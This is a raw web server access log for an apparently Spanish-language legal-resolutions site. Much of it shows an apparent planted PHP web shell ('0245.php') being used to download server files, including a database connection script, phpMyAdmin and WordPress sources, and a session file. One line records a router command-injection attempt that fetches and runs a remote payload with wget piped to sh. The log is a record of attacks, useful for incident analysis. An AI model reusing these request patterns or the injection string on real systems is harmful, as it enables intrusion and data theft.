47.128.115.174 - - [16/Jun/2024:21:21:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0968.pdf&ft=download&white=1 HTTP/1.1" 200 20135
216.244.66.195 - - [16/Jun/2024:21:21:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0481.pdf HTTP/1.1" 200 291122
47.128.20.61 - - [16/Jun/2024:21:22:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1244.pdf&ft=download&white=1 HTTP/1.1" 200 462503
216.244.66.195 - - [16/Jun/2024:21:22:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2904.pdf HTTP/1.1" 200 287030
201.245.192.253 - - [16/Jun/2024:21:22:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.115.208 - - [16/Jun/2024:21:22:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=ms-functions.php&ft=download&white=1 HTTP/1.1" 200 77218
216.244.66.195 - - [16/Jun/2024:21:22:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3064.pdf HTTP/1.1" 200 304109
201.245.192.253 - - [16/Jun/2024:21:23:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:21:23:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3150.pdf HTTP/1.1" 200 251104
66.249.66.20 - - [16/Jun/2024:21:23:28 -0500] "GET /Publicaciones/2024EE61094.pdf HTTP/1.1" 404 227
47.128.115.188 - - [16/Jun/2024:21:23:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0305.pdf&ft=download&white=1 HTTP/1.1" 200 868007
216.244.66.195 - - [16/Jun/2024:21:23:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0056.pdf HTTP/1.1" 200 328951
216.245.221.92 - - [16/Jun/2024:21:24:02 -0500] "HEAD / HTTP/1.1" 200 -
47.128.54.171 - - [16/Jun/2024:21:24:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5Cexport&f=ExportCsv.class.php&ft=download HTTP/1.1" 200 11047
201.245.192.253 - - [16/Jun/2024:21:24:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:21:24:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [16/Jun/2024:21:24:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0204.pdf HTTP/1.1" 200 327608
172.22.2.4 - - [16/Jun/2024:21:22:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:21:24:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0383.pdf HTTP/1.1" 200 297420
47.128.50.127 - - [16/Jun/2024:21:24:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2701.pdf&ft=download&white=1 HTTP/1.1" 200 233127
66.249.66.21 - - [16/Jun/2024:21:25:05 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/05923.pdf HTTP/1.1" 200 1012156
66.249.66.21 - - [16/Jun/2024:21:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/5951.pdf HTTP/1.1" 200 419889
172.22.2.4 - - [16/Jun/2024:21:23:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44737
216.244.66.195 - - [16/Jun/2024:21:25:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1299.pdf HTTP/1.1" 200 337426
201.245.192.253 - - [16/Jun/2024:21:25:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.141 - - [16/Jun/2024:21:25:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=tbl_views.lib.php&ft=download&white=1 HTTP/1.1" 200 4533
216.244.66.195 - - [16/Jun/2024:21:25:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1647.pdf HTTP/1.1" 200 411056
172.22.2.4 - - [16/Jun/2024:21:24:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40647
172.22.2.4 - - [16/Jun/2024:21:24:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [16/Jun/2024:21:25:51 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.66.19 - - [16/Jun/2024:21:26:05 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 304 -
216.244.66.195 - - [16/Jun/2024:21:26:11 -0500] "GET /BLA/resoluciones/AUTOS%202007/0088.pdf HTTP/1.1" 200 114221
201.245.192.253 - - [16/Jun/2024:21:26:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.54.229 - - [16/Jun/2024:21:26:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5789.pdf&ft=download&white=1 HTTP/1.1" 200 368295
216.244.66.195 - - [16/Jun/2024:21:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202007/0108.pdf HTTP/1.1" 200 46791
216.244.66.195 - - [16/Jun/2024:21:26:56 -0500] "GET /BLA/resoluciones/AUTOS%202007/0155.pdf HTTP/1.1" 200 223546
47.128.54.184 - - [16/Jun/2024:21:26:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=user-edit.php&ft=download&white=1 HTTP/1.1" 200 23221
201.245.192.253 - - [16/Jun/2024:21:26:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36445
201.245.192.253 - - [16/Jun/2024:21:26:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34550
66.249.66.21 - - [16/Jun/2024:21:27:05 -0500] "GET /Publicaciones/2024EE63601.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:21:27:16 -0500] "GET /BLA/resoluciones/AUTOS%202007/0233.pdf HTTP/1.1" 200 16202
201.245.192.253 - - [16/Jun/2024:21:27:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:21:27:35 -0500] "GET /BLA/resoluciones/AUTOS%202007/0343.pdf HTTP/1.1" 200 122549
47.128.27.133 - - [16/Jun/2024:21:27:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=error_report.php&ft=download&white=1 HTTP/1.1" 200 3123
216.244.66.195 - - [16/Jun/2024:21:27:54 -0500] "GET /BLA/resoluciones/AUTOS%202007/0411.pdf HTTP/1.1" 200 25270
216.244.66.195 - - [16/Jun/2024:21:28:11 -0500] "GET /BLA/resoluciones/AUTOS%202007/0502.pdf HTTP/1.1" 200 19754
47.128.16.250 - - [16/Jun/2024:21:28:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=capabilities.php&ft=download&white=1 HTTP/1.1" 200 40038
201.245.192.253 - - [16/Jun/2024:21:28:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:21:28:27 -0500] "GET /BLA/resoluciones/AUTOS%202007/0580.pdf HTTP/1.1" 200 62452
216.244.66.195 - - [16/Jun/2024:21:28:42 -0500] "GET /BLA/resoluciones/AUTOS%202007/0614.pdf HTTP/1.1" 200 287925
201.245.192.253 - - [16/Jun/2024:21:28:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34404
47.128.16.225 - - [16/Jun/2024:21:29:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2069.pdf&ft=download&white=1 HTTP/1.1" 200 392871
216.245.221.92 - - [16/Jun/2024:21:29:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:29:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:21:29:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:29:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34550
47.128.16.193 - - [16/Jun/2024:21:29:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3694.pdf&ft=download HTTP/1.1" 200 368295
172.22.2.4 - - [16/Jun/2024:21:28:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:30:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.16.227 - - [16/Jun/2024:21:30:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+401-450&f=00000443.tif&ft=download HTTP/1.1" 200 125830
172.22.2.4 - - [16/Jun/2024:21:29:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
47.128.96.42 - - [16/Jun/2024:21:31:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=SpotAgua.flv&ft=download HTTP/1.1" 200 2084514
201.245.192.253 - - [16/Jun/2024:21:31:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.31.41 - - [16/Jun/2024:21:31:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6744.pdf&ft=download&white=1 HTTP/1.1" 200 1277606
201.245.192.253 - - [16/Jun/2024:21:32:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.232 - - [16/Jun/2024:21:32:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6224.pdf&ft=download&white=1 HTTP/1.1" 200 360103
47.128.116.87 - - [16/Jun/2024:21:33:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0474.pdf&ft=download&white=1 HTTP/1.1" 200 405159
201.245.192.253 - - [16/Jun/2024:21:33:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:32:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62720
47.128.31.246 - - [16/Jun/2024:21:33:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=feed-rdf.php&ft=download&white=1 HTTP/1.1" 200 2640
216.245.221.92 - - [16/Jun/2024:21:34:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:34:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:34:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.34.143 - - [16/Jun/2024:21:34:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cforest%5C&f=conex.php&ft=download&white=1 HTTP/1.1" 200 402
47.128.116.219 - - [16/Jun/2024:21:35:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes&f=feed-rdf.php&ft=download HTTP/1.1" 200 2640
201.245.192.253 - - [16/Jun/2024:21:35:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.24.7 - - [16/Jun/2024:21:35:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1673.pdf&ft=download&white=1 HTTP/1.1" 200 409255
172.22.2.4 - - [16/Jun/2024:21:34:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:21:36:13 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:21:36:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.20.255 - - [16/Jun/2024:21:36:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=link-manager.php&ft=download&white=1 HTTP/1.1" 200 3481
172.22.2.4 - - [16/Jun/2024:21:35:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:21:36:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36445
201.245.192.253 - - [16/Jun/2024:21:36:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34550
47.128.33.129 - - [16/Jun/2024:21:37:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5Cexport&f=ExportXml.class.php&ft=download HTTP/1.1" 200 17708
201.245.192.253 - - [16/Jun/2024:21:37:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.18.239 - - [16/Jun/2024:21:37:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3862.pdf&ft=download&white=1 HTTP/1.1" 200 396967
201.245.192.253 - - [16/Jun/2024:21:38:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:36:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62310
47.128.117.159 - - [16/Jun/2024:21:38:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2701.pdf&ft=download HTTP/1.1" 200 339623
201.245.192.253 - - [16/Jun/2024:21:38:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34404
216.245.221.92 - - [16/Jun/2024:21:39:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:39:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:39:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.50.215 - - [16/Jun/2024:21:39:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400%5C&f=00000357.tif&ft=notepad&white=1 HTTP/1.1" 200 245445
201.245.192.253 - - [16/Jun/2024:21:39:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34550
47.128.18.185 - - [16/Jun/2024:21:40:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3176.pdf&ft=download HTTP/1.1" 200 388775
201.245.192.253 - - [16/Jun/2024:21:40:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.144 - - [16/Jun/2024:21:40:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=ms-sites.php&ft=download HTTP/1.1" 200 228
172.22.2.4 - - [16/Jun/2024:21:40:48 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [16/Jun/2024:21:41:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:21:41:22 -0500] "GET /Publicaciones/2024EE57274.pdf HTTP/1.1" 404 227
66.249.66.21 - - [16/Jun/2024:21:41:23 -0500] "GET /Publicaciones/2024EE55559.pdf HTTP/1.1" 404 227
47.128.18.171 - - [16/Jun/2024:21:41:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+401-450&f=00000413.tif&ft=download HTTP/1.1" 200 242852
172.22.2.4 - - [16/Jun/2024:21:41:34 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000002%20DEL%2031%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 382171
172.22.2.4 - - [16/Jun/2024:21:40:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.27.150 - - [16/Jun/2024:21:42:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1-50&f=00000028.tif&ft=download HTTP/1.1" 200 994979
201.245.192.253 - - [16/Jun/2024:21:42:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:41:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
47.128.96.67 - - [16/Jun/2024:21:42:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6411.pdf&ft=download&white=1 HTTP/1.1" 200 474791
201.245.192.253 - - [16/Jun/2024:21:43:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:21:43:23 -0500] "GET /BLA/resoluciones/AUTOS%202023/0234.pdf HTTP/1.1" 304 -
47.128.126.181 - - [16/Jun/2024:21:43:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4627.pdf&ft=download&white=1 HTTP/1.1" 200 372391
216.245.221.92 - - [16/Jun/2024:21:44:02 -0500] "HEAD / HTTP/1.1" 200 -
114.119.135.172 - - [16/Jun/2024:21:44:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2019/ HTTP/1.1" 200 14291
47.128.96.252 - - [16/Jun/2024:21:44:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150709-1646-716000.txt&ft=download HTTP/1.1" 200 2968
201.245.192.253 - - [16/Jun/2024:21:44:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:44:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.248 - - [16/Jun/2024:21:44:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Ctmp&f=sess_6k4v6lhg8ku7fucl5f9t9h6vf3&ft=download HTTP/1.1" 200 66
172.22.2.4 - - [16/Jun/2024:21:45:06 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:21:45:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.39.228 - - [16/Jun/2024:21:45:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2151-2200&f=00002183.tif&ft=download HTTP/1.1" 200 20131
172.22.2.4 - - [16/Jun/2024:21:45:56 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [16/Jun/2024:21:45:57 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.29.180.161 - - [16/Jun/2024:21:46:01 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
186.29.180.161 - - [16/Jun/2024:21:46:13 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
47.128.96.63 - - [16/Jun/2024:21:46:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0279.pdf&ft=download&white=1 HTTP/1.1" 200 351911
186.29.180.161 - - [16/Jun/2024:21:46:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2023%2F HTTP/1.1" 200 572303
201.245.192.253 - - [16/Jun/2024:21:46:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.180.161 - - [16/Jun/2024:21:46:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/08778.pdf HTTP/1.1" 200 416631
47.128.43.148 - - [16/Jun/2024:21:47:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=RESOLUCION+2076+DE+2000.pdf&ft=img&white=1 HTTP/1.1" 200 49913
201.245.192.253 - - [16/Jun/2024:21:47:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.35 - - [16/Jun/2024:21:47:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6402.pdf&ft=download&white=1 HTTP/1.1" 200 356007
172.22.2.4 - - [16/Jun/2024:21:46:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:48:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.250 - - [16/Jun/2024:21:48:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4572.pdf&ft=download&white=1 HTTP/1.1" 200 368295
172.22.2.4 - - [16/Jun/2024:21:46:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.245.221.92 - - [16/Jun/2024:21:49:02 -0500] "HEAD / HTTP/1.1" 200 -
47.128.122.52 - - [16/Jun/2024:21:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4739.pdf&ft=download HTTP/1.1" 200 487079
201.245.192.253 - - [16/Jun/2024:21:49:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:49:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.232 - - [16/Jun/2024:21:49:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6787.pdf&ft=download HTTP/1.1" 200 372391
185.191.127.212 - - [16/Jun/2024:21:49:47 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:21:50:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.37.139 - - [16/Jun/2024:21:50:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4158.pdf&ft=download&white=1 HTTP/1.1" 200 360103
47.128.125.190 - - [16/Jun/2024:21:51:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5877.pdf&ft=download&white=1 HTTP/1.1" 200 380583
201.245.192.253 - - [16/Jun/2024:21:51:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.123 - - [16/Jun/2024:21:51:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0409.pdf&ft=img&white=1 HTTP/1.1" 200 75762
201.245.192.253 - - [16/Jun/2024:21:52:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.43.2 - - [16/Jun/2024:21:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=tbl_row_action.php&ft=download&white=1 HTTP/1.1" 200 3905
66.249.66.38 - - [16/Jun/2024:21:52:48 -0500] "GET /mas-de-1000-personas-participaron-en-la-convencion-de-emergencia-climatica-una-mirada-optimista-y-un-llamado-a-la-accion.html HTTP/1.1" 304 -
47.128.122.66 - - [16/Jun/2024:21:53:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1683.pdf&ft=download&white=1 HTTP/1.1" 200 417447
201.245.192.253 - - [16/Jun/2024:21:53:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:51:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.21.72 - - [16/Jun/2024:21:53:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1551-1600&f=00001583.tif&ft=download HTTP/1.1" 200 191458
216.245.221.92 - - [16/Jun/2024:21:54:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:54:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:54:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:54:23 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
